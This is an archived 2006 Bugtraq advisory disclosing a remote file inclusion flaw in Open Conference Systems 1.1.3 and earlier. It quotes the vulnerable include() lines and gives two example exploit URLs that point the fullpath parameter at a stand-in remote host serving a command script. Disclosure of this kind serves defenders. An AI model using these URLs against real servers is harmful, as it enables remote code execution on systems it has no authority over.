| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 13 Oct 2006 06:19:57 -0000 From: k1tk4t@...hack.org To: bugtraq@...urityfocus.com Subject: Open Conference Systems <= 1.1.3 Remote File Inclusion ######################################################################### # Open Conference Systems <= 1.1.3 Remote File Inclusion # Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz # # Found By : k1tk4t - k1tk4t[4t]newhack.org # Location : Indonesia -- #newhack[dot]org ######################################################################## file ; theme.inc.php footer.inc.php ######################################################################## bugs ; at -- theme.inc.php include($fullpath."themes/$theme/theme.inc.php"); at -- footer.inc.php include_once($fullpath."include/theme.inc.php"); ######################################################################## exmple and methode exploit ; http://localhost/ocs/include/theme.inc.php?fullpath=http://shell/cmd.gif? http://localhost/ocs/include/footer.inc.php?fullpath=http://shell/cmd.gif? ######################################################################## Thanks; str0ke milw0rm google #e-c-h-o (all member echo community) #nyubicrew (all member solpotcrew community) #asiahacker person; y3dips,lirva32,the_day,K-159(&all echo staff) evilcode,illibero,NoGe(asiahacker), nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)
Powered by blists - more mailing lists